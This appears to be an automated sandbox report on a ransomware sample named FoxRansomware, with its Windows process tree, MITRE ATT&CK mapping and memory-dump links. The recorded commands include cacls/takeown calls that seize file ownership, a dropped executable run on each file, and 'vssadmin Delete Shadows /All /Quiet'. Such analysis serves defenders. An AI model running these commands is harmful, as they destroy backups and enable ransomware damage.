    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"
    3⤵
    - Modifies file permissions
    PID:960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1788
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""
  2⤵
  PID:1312
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C
    3⤵
    PID:972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"
    3⤵
    - Modifies file permissions
    PID:1456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "CourierStd-Oblique.otf" -nobanner
    3⤵
    PID:1820
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "CourierStd-Oblique.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1244
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"
    3⤵
    - Modifies file permissions
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "SY______.PFM" -nobanner
    3⤵
    PID:1800
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "SY______.PFM" -nobanner
      4⤵
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
    3⤵
    PID:988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
    3⤵
    - Modifies file permissions
    PID:796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
    3⤵
    PID:1648
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
      4⤵
      PID:1188
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"
    3⤵
    - Modifies file permissions
    PID:912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "can129.hsp" -nobanner
    3⤵
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "can129.hsp" -nobanner
      4⤵
      PID:1728
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:960
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""
  2⤵
  PID:1396
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"
    3⤵
    - Modifies file permissions
    PID:908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "icudt26l.dat" -nobanner
    3⤵
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "icudt26l.dat" -nobanner
      4⤵
      PID:1244
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
    3⤵
    - Modifies file permissions
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "ROMANIAN.TXT" -nobanner
    3⤵
    PID:324
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "ROMANIAN.TXT" -nobanner
      4⤵
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""
  2⤵
  PID:1760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C
    3⤵
    PID:596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"
    3⤵
    - Modifies file permissions
    PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "CP1258.TXT" -nobanner
    3⤵
    PID:1764
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "CP1258.TXT" -nobanner
      4⤵
      PID:1188
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1920

C:\Windows\system32\taskeng.exe
taskeng.exe {EB7F2D72-EF81-4BC1-8E6E-4B80A86774C3} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]
1⤵
PID:1684
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\uPd6kpQD.bat"
  2⤵
  PID:588
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1600

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:992

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1552-55-0x0000000075B11000-0x0000000075B13000-memory.dmp

Filesize
8KB

Download
memory/2040-66-0x00000000023A0000-0x0000000002FEA000-memory.dmp

Filesize
12.3MB

Download
memory/2040-65-0x00000000023A0000-0x0000000002FEA000-memory.dmp

Filesize
12.3MB

Download
memory/2040-64-0x00000000023A0000-0x0000000002FEA000-memory.dmp

Filesize
12.3MB

Download